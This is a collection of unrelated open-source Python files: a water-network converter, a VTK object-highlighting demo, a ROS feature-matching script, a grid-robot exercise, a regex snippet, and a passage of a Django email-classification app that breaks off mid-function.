    if (read_format == 'source'):
        node_id += 1
        data = line.split()
        id = data[0]
        head = float(data[1])
        demand = -1
        source.append(node_id)
        node_map[id] = node_id
        node_type = 2
        node_str = '%d %f %f %d\n' % (node_id, demand, head, node_type)
        node_file.write(node_str)
    if (read_format == 'tank'):
        node_id += 1
        data = line.split()
        id = data[0]
        head = float(data[1])
        node_map[id] = node_id
        node_type = 3
        node_str = '%d %f %f %d\n' % (node_id, 0, head, node_type)
        node_file.write(node_str)
    if (read_format == 'pipe'):
        edge_id += 1
        data = line.split()
        node_1 = data[1]
        node_2 = data[2]
        edge_map[edge_id] = node_1 + "," + node_2
        length = float(data[3])
        diameter = float(data[4])
        roughness = float(data[5])
        edge_type = 0
        edge_str = '%d %d %d %f %f %f %d\n' % (edge_id, node_map[node_1], node_map[node_2], length, diameter, roughness, edge_type)
        edge_file.write(edge_str)
    if (read_format == 'pump'):
        edge_id += 1
        data = line.split()
        node_1 = data[1]
        node_2 = data[2]
        edge_map[edge_id] = node_1 + "," + node_2
        # pumps get fixed placeholder geometry
        length = 0.1
        diameter = 250.0
        roughness = 1.50
        edge_type = 1
        edge_str = '%d %d %d %f %f %f %d\n' % (edge_id, node_map[node_1], node_map[node_2], length, diameter, roughness, edge_type)
        edge_file.write(edge_str)
    if (read_format == 'valve'):
        edge_id += 1
        data = line.split()
        node_1 = data[1]
        node_2 = data[2]
        edge_map[edge_id] = node_1 + "," + node_2
        length = 0.1
        diameter = float(data[3])
        roughness = float(data[6])
        edge_type = 2
        edge_str = '%d %d %d %f %f %f %d\n' % (edge_id, node_map[node_1], node_map[node_2], length, diameter, roughness, edge_type)
        edge_file.write(edge_str)
    if (read_format == 'pump_curve'):
        data = line.split()
        pump_name = data[0].split(".")
        if pump_name[0] in node_map:
            head_name = node_map[pump_name[0]]
            tail_name = node_map[pump_name[1]]
            x_value = float(data[1])
            y_value = float(data[2])
            curve_str = '%d %d %d %f %f\n' % (pump_id,head_name,tail_name,x_value,y_value)
            pump_file.write(curve_str)
            pump_id_proxy = pump_id
f.close()
# Write general info file
info = open('big.txt', 'w')
info.write('%d %d %d\n' % (node_id, edge_id, pump_id_proxy))
for item in source:
    info.write('%d ' % (item))
info.write('\n')
for item in outlet:
    info.write('%d ' % (item))
info.close()
node_file.close()
edge_file.close()
pump_file.close()
| MartinSuGJ/water_pipe | code/data_clean/water_instances_convert_new_new.py | water_instances_convert_new_new.py | py | 4,306 | python | en | code | 1 | github-code | 36 |
71578947943 | # !/usr/bin/env python
import vtk
def get_program_parameters():
    """Parse the command line and return the requested sphere count (default 10)."""
    import argparse
    description = 'Highlighting a selected object with a silhouette.'
    epilogue = '''
    Click on the object to highlight it.
    The selected object is highlighted with a silhouette.
    '''
    parser = argparse.ArgumentParser(description=description, epilog=epilogue,
                                     formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument('numberOfSpheres', nargs='?', type=int, default=10,
                        help='The number of spheres, default is 10.')
    return parser.parse_args().numberOfSpheres
class MouseInteractorHighLightActor(vtk.vtkInteractorStyleTrackballCamera):
    """Trackball-camera interactor that outlines the actor picked with the left button."""

    def __init__(self, silhouette=None, silhouetteActor=None):
        self.AddObserver("LeftButtonPressEvent", self.onLeftButtonDown)
        self.LastPickedActor = None
        self.Silhouette = silhouette
        self.SilhouetteActor = silhouetteActor

    def onLeftButtonDown(self, obj, event):
        """Pick at the click position and move the silhouette to the picked actor."""
        click_x, click_y = self.GetInteractor().GetEventPosition()
        picker = vtk.vtkPropPicker()
        picker.Pick(click_x, click_y, 0, self.GetDefaultRenderer())
        self.LastPickedActor = picker.GetActor()
        if self.LastPickedActor:
            renderer = self.GetDefaultRenderer()
            # Replace any previous silhouette with one built from the newly
            # picked actor's polydata.
            renderer.RemoveActor(self.SilhouetteActor)
            self.Silhouette.SetInputData(self.LastPickedActor.GetMapper().GetInput())
            renderer.AddActor(self.SilhouetteActor)
        # Forward the event so camera interaction keeps working.
        self.OnLeftButtonDown()

    def SetSilhouette(self, silhouette):
        self.Silhouette = silhouette

    def SetSilhouetteActor(self, silhouetteActor):
        self.SilhouetteActor = silhouetteActor
def main():
    """Build a scene of random spheres and run the interactor; clicking a
    sphere highlights it with a silhouette (see MouseInteractorHighLightActor)."""
    numberOfSpheres = get_program_parameters()
    colors = vtk.vtkNamedColors()
    # A renderer and render window
    renderer = vtk.vtkRenderer()
    renderer.SetBackground(colors.GetColor3d('SteelBlue'))
    renderWindow = vtk.vtkRenderWindow()
    renderWindow.SetSize(640, 480)
    renderWindow.AddRenderer(renderer)
    # An interactor
    interactor = vtk.vtkRenderWindowInteractor()
    interactor.SetRenderWindow(renderWindow)
    # Add spheres to play with
    for i in range(numberOfSpheres):
        source = vtk.vtkSphereSource()
        # random position and radius
        x = vtk.vtkMath.Random(-5, 5)
        y = vtk.vtkMath.Random(-5, 5)
        z = vtk.vtkMath.Random(-5, 5)
        radius = vtk.vtkMath.Random(.5, 1.0)
        source.SetRadius(radius)
        source.SetCenter(x, y, z)
        source.SetPhiResolution(11)
        source.SetThetaResolution(21)
        mapper = vtk.vtkPolyDataMapper()
        mapper.SetInputConnection(source.GetOutputPort())
        actor = vtk.vtkActor()
        actor.SetMapper(mapper)
        # random diffuse color plus a white specular highlight
        r = vtk.vtkMath.Random(.4, 1.0)
        g = vtk.vtkMath.Random(.4, 1.0)
        b = vtk.vtkMath.Random(.4, 1.0)
        actor.GetProperty().SetDiffuseColor(r, g, b)
        actor.GetProperty().SetDiffuse(.8)
        actor.GetProperty().SetSpecular(.5)
        actor.GetProperty().SetSpecularColor(colors.GetColor3d('White'))
        actor.GetProperty().SetSpecularPower(30.0)
        renderer.AddActor(actor)
    # Render and interact
    renderWindow.Render()
    # Create the silhouette pipeline, the input data will be set in the
    # interactor
    silhouette = vtk.vtkPolyDataSilhouette()
    silhouette.SetCamera(renderer.GetActiveCamera())
    # Create mapper and actor for silhouette
    silhouetteMapper = vtk.vtkPolyDataMapper()
    silhouetteMapper.SetInputConnection(silhouette.GetOutputPort())
    silhouetteActor = vtk.vtkActor()
    silhouetteActor.SetMapper(silhouetteMapper)
    silhouetteActor.GetProperty().SetColor(colors.GetColor3d("Tomato"))
    silhouetteActor.GetProperty().SetLineWidth(5)
    # Set the custom type to use for interaction.
    style = MouseInteractorHighLightActor(silhouette, silhouetteActor)
    style.SetDefaultRenderer(renderer)
    # Start
    interactor.Initialize()
    interactor.SetInteractorStyle(style)
    renderWindow.SetWindowName('HighlightWithSilhouette')
    renderWindow.Render()
    interactor.Start()
# Script entry point.
if __name__ == "__main__":
    main()
| lorensen/VTKExamples | src/Python/Picking/HighlightWithSilhouette.py | HighlightWithSilhouette.py | py | 4,453 | python | en | code | 319 | github-code | 36 |
30922250366 | #!/usr/bin/env python
# from __future__ import division
import numpy as np
import message_filters
from matplotlib import pyplot as plt
import imutils
from time import time, sleep
# import os
from sensor_msgs.msg import Image
from geometry_msgs.msg import Point, Pose, Quaternion, Vector3
from cv_bridge import CvBridge, CvBridgeError
import rospy
import copy
# import stereoDepth as SD
# from sklearn import linear_model, datasets
from nav_msgs.msg import Odometry # We need this message type to read position and attitude from Bebop nav_msgs/Odometry
from geometry_msgs.msg import Twist
from geometry_msgs.msg import Point
from std_msgs.msg import Empty
# import PlaneRANSAC as PR
from itertools import compress
import tf
from optic_flow_example.msg import OpticFlowMsg
import cPickle
import sys
# from pykalman import UnscentedKalmanFilter
# from robust_kalman import RobustKalman
# from robust_kalman.utils import HuberScore, VariablesHistory, WindowStatisticsEstimator
from sklearn.cluster import KMeans
# from sklearn.linear_model import RANSACRegressor
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import cv2
sys.path.append('/opt/ros/kinetic/lib/python2.7/dist-packages')
# Reference keypoints/descriptors of the target image, precomputed offline
# and loaded from disk at import time.
keypoints = cPickle.loads(open("./keypoints.txt").read())
kp = []
for point in keypoints:
    # Rebuild cv2.KeyPoint objects from the pickled plain tuples.
    temp = cv2.KeyPoint(x=point[0][0],y=point[0][1],_size=point[1], _angle=point[2], _response=point[3], _octave=point[4], _class_id=point[5])
    kp.append(temp)
des_img_des = np.loadtxt('descriptors.txt', dtype = float)
a = des_img_des
# a1 = np.loadtxt('descriptors1.txt', dtype = float)
rolavnum = 4  # window length of the rolling-average centroid filter
it = 0        # frames processed so far (used to prime the rolling window)
# Rolling average
xarr = np.zeros(rolavnum)
yarr = np.zeros(rolavnum)
flow_x = 0
flow_y = 0
# Camera focal length [pixel]
f = 202
# Stereo base distance [mm]
B = 30
prev_time = 0
x_prev = 0
y_prev = 0
prev_image = None
last_time = 0
# Lucas-Kanade optic-flow parameters (kept for the optional OpticalFlow path)
lk_params = dict( winSize  = (15,15),
                  maxLevel = 2,
                  criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
bridge = CvBridge()
points_to_track = []
# Publishers: detected wall centre point and the annotated debug image.
center_pub = rospy.Publisher("/wall_center_point",Point)
contours_pub = rospy.Publisher('/mask', Image, queue_size=1)
def totuple(a):
    """Recursively convert nested iterables into nested tuples; scalars pass through."""
    try:
        return tuple(map(totuple, a))
    except TypeError:
        return a
def defpoints(image, spacing):
    """Build a regular grid of (col, row) tracking points over `image`.

    Returns a float32 array of shape (npoints, 1, 2), the layout OpenCV's
    optic-flow routines expect.
    """
    rows, cols = image.shape[0], image.shape[1]
    grid = [[c, r]
            for r in range(0, rows, spacing)
            for c in range(0, cols, spacing)]
    pts = np.array(grid, dtype=np.float32)  # float32 required by cv2 optic flow
    return pts.reshape(pts.shape[0], 1, pts.shape[1])
def writeOdom(data):
    """ROS odometry callback: cache the latest pose and twist in module globals."""
    global global_pos, global_vel
    global_pos = data.pose.pose
    global_vel = data.twist.twist
def rundetection():
    """Initialise the ROS node, wire up time-synchronised image callbacks
    plus the odometry callback, then spin until shutdown."""
    rospy.init_node('feature_detection', anonymous=True)
    # NOTE(review): both subscribers listen on the same topic; presumably a
    # left/right stereo pair was intended -- confirm topic names.
    right_sub = message_filters.Subscriber("/image_raw_throttled", Image, queue_size=10)#,heyo1)#,queue_size=4)
    left_sub = message_filters.Subscriber("/image_raw_throttled", Image, queue_size=10)#,heyo2)#,queue_size=4)
    rospy.Subscriber('/bebop/odom', Odometry, writeOdom)
    ts = message_filters.TimeSynchronizer([left_sub,right_sub],10)
    # ts.registerCallback(OpticalFlow)
    ts.registerCallback(PoseEstimate)
    rospy.spin()
def featuredetect(img):
    """Detect SURF keypoints on a grayscale image and compute their descriptors.

    :param img: grayscale input image
    :return: (keypoints, descriptors) as produced by OpenCV's SURF detector
    """
    numFeatures = 500
    surf = cv2.xfeatures2d.SURF_create(numFeatures)
    kp, des = surf.detectAndCompute(img, None)
    # Removed: a cv2.drawKeypoints call whose result was assigned to a local
    # that was never used (wasted work on every frame).
    return kp, des
def featurecompare(des1, des2):
    """Return, for each descriptor in des1, its 2 nearest FLANN matches in des2."""
    flann = cv2.DescriptorMatcher_create(cv2.DescriptorMatcher_FLANNBASED)
    query = np.asarray(des1, np.float32)
    train = np.asarray(des2, np.float32)
    return flann.knnMatch(query, train, 2)
def plotter(image, points, points1, points2, cc, col, col1, col2):
    """Draw three point groups on the image and return the annotated copy.

    :param image: input image; converted grayscale->BGR when cc == 0
    :param points: first point set, drawn with color col
    :param points1: second point set, drawn with color col1
    :param points2: a single (x, y) point (e.g. a centroid), drawn with col2
    :param cc: 0 when `image` is grayscale and needs color conversion
    :param col, col1, col2: BGR colors for the three groups
    :return: the annotated color image
    """
    color_img = image
    if cc == 0:
        color_img = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
    linewidth = 3
    for x, y in points:
        cv2.circle(color_img, (int(x), int(y)), 5, col, thickness=linewidth)
    for x, y in points1:
        cv2.circle(color_img, (int(x), int(y)), 5, col1, thickness=linewidth)
    # points2 is a single coordinate pair, not a list of points.
    cv2.circle(color_img, (int(points2[0]), int(points2[1])), 5, col2, thickness=linewidth)
    return color_img
def plotavg(image, point, cc):
    """Draw a single green marker at `point` and display the image with pyplot."""
    color_img = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR) if cc == 0 else image
    # [0, 255, 0] is green in BGR order
    cv2.circle(color_img, (int(point[0]), int(point[1])), 5, [0, 255, 0], thickness=3)
    plt.cla()
    plt.imshow(color_img)
    plt.pause(0.05)
def find_squares(img):
    """Segment large bright regions (candidate wall squares) in a grayscale image.

    Pipeline: median blur -> min/max normalisation -> adaptive threshold ->
    erode -> outer contours -> invert -> keep the largest contours
    (area > 5000, at most 5) -> mask the input with them.

    :param img: grayscale input image (assumed single channel -- the RGB
        conversion is commented out; TODO confirm with callers)
    :return: (masked grayscale image, list of the retained contours)
    """
    gray_new = img
    # gray_new = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
    # edges are preserved while doing median blur while removing noise
    gra = cv2.medianBlur(gray_new,5)
    #image normalization
    gray = np.zeros(gra.shape)
    gray = cv2.normalize(gra, gray, 0, 255, cv2.NORM_MINMAX)
    # adaptive threshold
    thresh = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\
            cv2.THRESH_BINARY,17,2)
    # erode out the noise
    thresh = cv2.erode(thresh,np.ones((3,3), np.uint8),iterations=1)
    im, cnts, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
    drawing = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)
    # draw contours
    for i in range(len(cnts)):
        color_contours = (255, 255, 255)
        # draw contours in a black image
        cv2.drawContours(drawing, cnts, i, color_contours, 1, 8, hierarchy)
    # dilate the contour image so neighbouring outlines merge
    drawing1 = cv2.dilate(drawing, np.ones((3,3), np.uint8), iterations=9)
    img_not = np.zeros((drawing1.shape[0], drawing1.shape[1], 3), np.uint8)
    img_not = cv2.bitwise_not(drawing1)
    mask = cv2.cvtColor(img_not, cv2.COLOR_BGR2GRAY)
    im1, cnts1, hierarchy1 = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    cnt_area = []
    cnt_num = []
    for c in cnts1:
        cnt_area.append(cv2.contourArea(c))
    cnt_num = np.argsort(cnt_area)
    cnt_area.sort()
    large_cnts = np.zeros(np.shape(mask))
    cnts_oi=[]
    # NOTE(review): this indexes the 5 largest areas unconditionally; with
    # fewer than 5 contours the negative index wraps around -- confirm inputs
    # always yield >= 5 contours.
    for i in range(5): # in the 5 largest contours, check if cnt_area > 5000
        if cnt_area[len(cnt_area)-1-i] > 5000:
            fresh_im = np.zeros(np.shape(mask))
            cv2.drawContours(fresh_im, cnts1, cnt_num[len(cnt_num)-1-i], (255, 255, 255), -1)
            im_temp = 255*np.ones(mask.shape) - fresh_im
            cv2.drawContours(large_cnts, cnts1, cnt_num[len(cnt_num)-1-i], (255, 255, 255), -1)
            cnts_oi.append(cnts1[cnt_num[len(cnt_num)-1-i]])
    # dilate large conoturs
    large_cnts = cv2.dilate(large_cnts, np.ones((5,5), np.uint8), iterations=1)
    new_gray = cv2.bitwise_and(gray_new, gray_new, mask = np.uint8(large_cnts))
    # cv2.imshow('mas',new_gray)
    return new_gray, cnts_oi
class Queue:
    """Minimal FIFO queue backed by a list; duplicate entries are rejected."""

    def __init__(self):
        # Newest element lives at index 0, oldest at the end.
        self.queue = list()

    def enqueue(self, data):
        """Insert at the front unless already present; return True on success."""
        if data in self.queue:
            return False
        self.queue.insert(0, data)
        return True

    def dequeue(self):
        """Pop and return the oldest element, or a message string when empty."""
        if not self.queue:
            return ("Queue Empty!")
        return self.queue.pop()

    def size(self):
        """Return the number of stored elements."""
        return len(self.queue)

    def printQueue(self):
        """Return the backing list (newest first)."""
        return self.queue
# Rolling-average history of the dominant cluster's centroid coordinates.
points_max_cx = Queue()
points_max_cy = Queue()
def PoseEstimate(leftImg,rightImg):
    """Synchronised-image callback: locate the wall centre in the left image.

    Steps: segment candidate regions (find_squares), SURF-match against the
    stored reference descriptors, keep ratio-test survivors that fall inside
    a candidate contour, k-means the survivors, rolling-average the largest
    cluster's centroid, then publish the centre point and a debug image.
    NOTE(review): rightImg is received for synchronisation but never used.
    """
    global it
    left_image = bridge.imgmsg_to_cv2(leftImg, desired_encoding="mono8")
    img = left_image
    large_cnts = 0
    img, cnts_oi = find_squares(img)
    b1 = 0
    kp1, des1 = featuredetect(left_image)
    cur_img_des = des1
    b = cur_img_des
    matches = featurecompare(cur_img_des, des_img_des)
    points = np.zeros((len(matches),2))
    delta = np.zeros((len(matches),2))
    dist = np.zeros((len(matches)))
    matchMask = np.zeros((len(matches),2))
    # ratio test as per Lowe's paper
    # source: https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_feature2d/py_matcher/py_matcher.html
    # NOTE(review): range(0, len(matches)-1) skips the last match -- confirm
    # whether that is intentional.
    if len(matches)!=0:
        for i in range(0,len(matches)-1):
            points[i] = kp1[matches[i][0].queryIdx].pt#features[m.queryIdx]]
            if matches[i][0].distance < 0.8*matches[i][1].distance:
                matchMask[i]=[1,0]
        matchMaskbool = matchMask.astype('bool')
        points = points[matchMaskbool[:,0]]
    # Keep only matched points that lie inside (or on) a candidate contour.
    points_new = []#np.zeros((len(matches),2))
    for x in range(len(points)):
        for l in range(len(cnts_oi)):
            # print(points[x].tolist())
            point = (int(points[x][0]), int(points[x][1]))
            dist = cv2.pointPolygonTest(cnts_oi[l],point,False)
            if dist >= 0:
                points_new.append(points[x])
    # Cluster the surviving points (at most 3 clusters) and pick the largest.
    clusters_num = 3
    if len(points_new)<clusters_num:
        clusters_num = len(points_new)
    if clusters_num:
        print(clusters_num)
        estimator = KMeans(n_clusters=clusters_num)
        estimator.fit(points_new)
        # Ck's are the different clusters with corresponding point indices
        c1 = np.where(estimator.labels_ == 0)[0]
        c2 = np.where(estimator.labels_ == 1)[0]
        c3 = np.where(estimator.labels_ == 2)[0]
        max_len = len(c1)
        max_c = 0
        max_con = c1
        if len(c2) > max_len:
            max_len = len(c2)
            max_c = 1
            max_con = c2
        if len(c3) > max_len:
            max_len = len(c3)
            max_c = 2
            max_con = c3
        points_max_c = []
        # print(points_new[max_con[0]][:])
        for i in range(max_len):
            points_max_c.append(points_new[max_con[i]][:])
        max_cx = estimator.cluster_centers_[max_c][0]
        max_cy = estimator.cluster_centers_[max_c][1]
        # Maintain a fixed-size rolling window of centroid coordinates.
        if it<rolavnum:
            points_max_cx.enqueue(max_cx)
            points_max_cy.enqueue(max_cy)
        else:
            points_max_cx.dequeue()
            points_max_cy.dequeue()
            points_max_cx.enqueue(max_cx)
            points_max_cy.enqueue(max_cy)
        it = it + 1
        x = 0
        y = 0
        temo1 = points_max_cx.printQueue()
        temo2 = points_max_cy.printQueue()
        for i in range (points_max_cy.size()):
            x = x + temo1[i]
            y = y + temo2[i]
        # rolling avg centroid
        x = int(x/points_max_cy.size())
        y = int(y/points_max_cy.size())
        outt = Point()
        outt.x=x
        outt.y=y
        center_pub.publish(outt)
        # plotavg(img,(x,y),0)
        centroid = [x,y]
        # # plotter(img,np.array(points_new),0, (255, 0, 0))
        pub_cv = plotter(img, points_new, points_max_c, centroid, 0, (255, 0, 0), (0, 0, 255), (0, 255, 0))
        contours_pub.publish(bridge.cv2_to_imgmsg(pub_cv, "rgb8"))
# Script entry point: spin up the ROS node until interrupted.
if __name__ == '__main__':
    try:
        rundetection()
    except rospy.ROSInterruptException:
        pass
| tkurtiak/Project4b | matchfeat_old.py | matchfeat_old.py | py | 12,217 | python | en | code | 0 | github-code | 36 |
16556808242 | # Create a 2D matrix that acts as a workspace where a robot can move, ( eg: 1-> free space, 0-> obstacle). Create a function to insert obstacles at required/given coordinates. Write functions that can move the robot's(represent robot with other characters or numbers) position in the workspace. Write a function to visually represent the workspace, including the robot to the user on every move or change.
import numpy as np
def insert_obstacle(matrix, x, y, robot_x, robot_y):
    """Place an obstacle (1) at (x, y) unless the robot occupies that cell.

    Returns the (possibly unchanged) matrix either way.
    """
    if (x, y) == (robot_x, robot_y):
        print("Can't insert obstacle at the same position")
        return matrix
    matrix[x][y] = 1
    return matrix
# Check if there are obstacle and move, left, right, top ,bottom
# if obstacle is there then print warning and dont move
def move_robot(matrix, x, y, direction):
    """Move the robot one cell in direction 'w'/'a'/'s'/'d'.

    Returns the new (x, y), or the old position when the command is invalid,
    the move would leave the grid, or the target cell holds an obstacle
    (printing a message in each of those cases).

    Generalised: bounds are derived from the matrix shape instead of being
    hard-coded to a 10x10 grid; behaviour is unchanged for 10x10 inputs.
    """
    moves = {"w": (-1, 0), "s": (1, 0), "a": (0, -1), "d": (0, 1)}
    if direction not in moves:
        print("invalid command\n")
        return x, y
    dx, dy = moves[direction]
    nx, ny = x + dx, y + dy
    rows = len(matrix)
    cols = len(matrix[0]) if rows else 0
    if not (0 <= nx < rows and 0 <= ny < cols):
        print("Out of bound\n")
        return x, y
    if matrix[nx][ny] == 1:
        print("There is an obstacle at", nx, ny, "\n")
        return x, y
    return nx, ny
# print the matrix and obstacle and robot
def print_matrix(matrix, x, y):
    """Print the grid row by row, drawing '*' at the robot's cell (x, y)."""
    for r, row in enumerate(matrix):
        for c, cell in enumerate(row):
            token = "*" if (r, c) == (x, y) else cell
            print(token, end=" ")
        print()
# Interactive driver: a 10x10 workspace where the user can add obstacles
# or steer the robot with w/a/s/d ('q' leaves move mode).
if __name__ == "__main__":
    # create 10 * 10 matix
    matrix = np.zeros((10, 10), dtype=np.int8)
    robot_x, robot_y = 0, 0
    print_matrix(matrix, robot_x, robot_y)
    # take user input
    while True:
        print("\n\n* is robot\n1. Add obstacle")
        # NOTE(review): the menu advertises (a,s,d,f) but move_robot handles
        # w/a/s/d -- the prompt text looks stale.
        print("2. Move robot(a,s,d,f)")
        print("3. Quit")
        option = input("Enter your option: ")
        if option == "1":
            x = int(input("Enter x coordinate: "))
            y = int(input("Enter y coordinate: "))
            matrix = insert_obstacle(matrix, x, y, robot_x, robot_y)
            print_matrix(matrix, robot_x, robot_y)
        elif option == "2":
            # Keep moving until the user types 'q'.
            while True:
                direction = input("Enter direction: ")
                if direction == "q":
                    break
                robot_x, robot_y = move_robot(matrix, robot_x, robot_y, direction)
                print_matrix(matrix, robot_x, robot_y)
        elif option == "3":
            break
| ms-jagadeeshan/mars_task_2 | qn5.py | qn5.py | py | 2,574 | python | en | code | 0 | github-code | 36 |
6394243793 | import re
# Your sentence
sentence = "David and Lucy walk one mile to go to school every day at 8:00AM when there is no snow."
# The regular expression
time_regex = r"\b\d{1,2}:\d{2}(AM|PM)?\b"
# Search for the time in the sentence
time_match = re.search(time_regex, sentence)
if time_match:
# If the time was found, print it
print(f"Found time: {time_match.group()}")
else:
# If the time wasn't found, print a failure message
print("Time not found") | GranDiego117/KBAI | SentenceReadingAgent/test.py | test.py | py | 470 | python | en | code | 0 | github-code | 36 |
71504143463 | from django.shortcuts import render
from django.http import HttpResponse
from zipfile import ZipFile, is_zipfile, Path
import os
from outlook_msg import Message
import pandas as pd
import numpy as np
import re
import nltk
import spacy
from string import punctuation
import extract_msg
nltk.download('punkt')
from nltk.tokenize import word_tokenize
# NLTK stopwords modules
nltk.download('stopwords')
from nltk.corpus import stopwords
# NLTK lemmatization modules
nltk.download('wordnet')
from nltk.stem import WordNetLemmatizer
import io
import matplotlib.pyplot as plt
import sklearn
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
import pickle
import numpy as np
import pandas as pd
from keras import backend as K
from keras.layers.experimental.preprocessing import TextVectorization
from keras.preprocessing.text import one_hot,Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Reshape,RepeatVector,LSTM,Dense,Flatten,Bidirectional,Embedding,Input,Layer,GRU,Multiply,Activation,Lambda,Dot,TimeDistributed,Dropout,Embedding
from keras.models import Model
from keras.activations import softmax,selu,sigmoid
from keras.optimizers import Adam
from keras.initializers import glorot_uniform
from keras.regularizers import l2
from keras.constraints import min_max_norm
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import plot_model
import tensorflow as tf
import os
import gensim
from tqdm import tqdm
import keras
from .attention_with_context import *
from .sentence_encoder import *
from .word_encoder import *
########### GLOBALS ##################################
tfidf = None  # fitted TfidfVectorizer; assigned by trainml()
category_filename = "category.pkl"  # pickled list of category names (written at train time)
test_filelist_filename = "test_filenames.pkl"  # pickled test file names
tfidf_file = 'tfidf_file.pkl'  # pickled vectorizer, reloaded at test time
########## VIEWS ##################################
# Create your views here.
def index1(request):
    """Render the landing page; training is always reported as not done here.

    Cleanup: removed large blocks of commented-out model-loading code and
    merged the two identical GET/POST branches (behaviour is unchanged --
    other HTTP methods still fall through and return None).
    """
    if request.method in ('GET', 'POST'):
        return render(request, 'home.html', {'train_success': False})
def submit_data(request):
    """Accept a zip of .msg emails grouped in per-category folders, extract
    them, build a CSV dataset, preprocess it and stream the raw CSV back.

    GET is rejected with a FORBIDDEN page; POST expects a 'train' file upload
    containing a zip whose top-level folder names are the categories.
    Cleanup: removed leftover debug prints and an unreachable
    `return HttpResponse("DONE")` that followed the response return.
    """
    if request.method == 'GET':
        return HttpResponse("<h1>FORBIDDEN!</h1> <h2>This Page Cannot Be Accessed Directly.</h2>")
    elif request.method == 'POST':
        file = request.FILES['train']
        if is_zipfile(file) is False:
            return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload A Zip File Containing The DataSet</h2>")
        # Stores the categories obtained
        cats = []
        # Extract the files to a new directory named by the input folder name
        file_path = ""
        with ZipFile(file, 'r') as myzip:
            path = Path(myzip)
            for dir in path.iterdir():
                cats.append(dir.name)
            file_path = os.getcwd() + os.path.sep + myzip.filename.split('.')[0]
            myzip.extractall(path=file_path)
        # save the category file to disk, so that can be retrieved while testing
        open_file = open(category_filename, 'wb')
        pickle.dump(cats, open_file)
        open_file.close()
        # Walk each category folder and collect (category, subject, body) rows.
        data = []
        for cat in cats:
            sub_path = file_path + os.path.sep + cat
            for root, directories, files in os.walk(sub_path):
                for file in files:
                    abs_path = os.path.join(root, file)
                    with open(abs_path) as msg_file:
                        msg = Message(msg_file)
                        sub = "\"" + msg.subject + "\""
                        body = "\"" + msg.body + "\""
                        data.append([cat, sub, body])
        df = pd.DataFrame(data, columns=['Category', 'Subject', 'Body'])
        csv_path = file_path + '.csv'
        df.to_csv(csv_path, index=False, header=True)
        preprocess(csv_path=csv_path)
        # Stream the generated CSV back to the caller.
        with open(csv_path, 'rb') as fh:
            response = HttpResponse(fh.read(), content_type="text/csv")
            response['Content-Disposition'] = 'inline; filename=' + os.path.basename(csv_path)
            return response
def index2(request):
    """Render the ML page; 'train_success' reflects whether a trained model
    file exists on disk.

    Fix: the previous version opened 'Train_AI_Model' just to probe its
    existence (via a bare except) and never closed the handle, leaking a
    file descriptor on every request; an existence check is equivalent here.
    """
    trained = os.path.isfile('Train_AI_Model')
    if request.method in ('GET', 'POST'):
        return render(request, 'home2.html', {'train_success': trained})
##### FUNCTION TO PREPROCESS DATA #############################
def remove_emails_urls(dataframe):
    """Blank out e-mail addresses (plus one trailing space) and http(s) URLs."""
    text = str(dataframe)
    text = re.sub(r'\S*@\S*\s?', '', text)
    return re.sub(r"http\S+", '', text)
def remove_dates(dataframe):
    """Strip date-like tokens: numeric dates, month names and weekday names."""
    # DD/MM/YYYY, MM/DD/YYYY and similar separator-based numeric formats
    numeric = r'(\b(0?[1-9]|[12]\d|30|31)[^\w\d\r\n:](0?[1-9]|1[0-2])[^\w\d\r\n:](\d{4}|\d{2})\b)|(\b(0?[1-9]|1[0-2])[^\w\d\r\n:](0?[1-9]|[12]\d|30|31)[^\w\d\r\n:](\d{4}|\d{2})\b)'
    # month names, full or abbreviated (e.g. "October", "oct")
    months = r'\b(?:jan(?:uary)?|feb(?:ruary)?|mar(?:ch)?|apr(?:il)?|may|jun(?:e)?|jul(?:y)?|aug(?:ust)?|sep(?:tember)?|oct(?:ober)?|(nov|dec)(?:ember)?)(?=\D|$)'
    # weekday names, full or abbreviated (e.g. "monday", "mon")
    weekdays = r'\b((mon|tues|wed(nes)?|thur(s)?|fri|sat(ur)?|sun)(day)?)\b'
    for pattern in (numeric, months, weekdays):
        dataframe = re.sub(pattern, '', dataframe)
    return dataframe
def remove_useless(dataframe):
    """Drop boilerplate mail-header tokens from subject/body text.

    Body tokens come first, subject tokens ('fw:', 're:') last, matching the
    original substitution order.
    """
    for token in ('from:', 'sent:', 'to:', 'cc:', 'bcc:', 'subject:',
                  'message encrypted', 'warning:', 'fw:', 're:'):
        dataframe = re.sub(token, '', dataframe)
    return dataframe
def remove_punctuation(text):
    """Drop every character that is neither a word character nor whitespace."""
    return re.sub('[^\w\s]', '', text)
def remove_no(text):
    """Strip every run of digits from the text."""
    return re.sub(r"\d+", '', text)
def remove_of_words(text):
    """Normalise underscore-joined tokens: _w_, _w, w_ -> w and w1_w2 -> 'w1 w2'."""
    transforms = (
        (r"\b_([a-zA-z]+)_\b", r"\1"),           # _word_ -> word
        (r"\b_([a-zA-z]+)\b", r"\1"),            # _word  -> word
        (r"\b([a-zA-z]+)_\b", r"\1"),            # word_  -> word
        (r"\b([a-zA-Z]+)_([a-zA-Z]+)\b", r"\1 \2"),  # word1_word2 -> word1 word2
    )
    for pattern, repl in transforms:
        text = re.sub(pattern, repl, text)
    return text
def remove_less_two(text):
    """Delete words of three characters or fewer (despite the function's name)."""
    return re.sub(r'\b\w{1,3}\b', "", text)
def remove_char(dataframe):
    """Collapse whitespace runs to single spaces, trim the ends and drop a
    long underscore rule left over from message formatting."""
    collapsed = re.sub(r"\s+", ' ', dataframe)
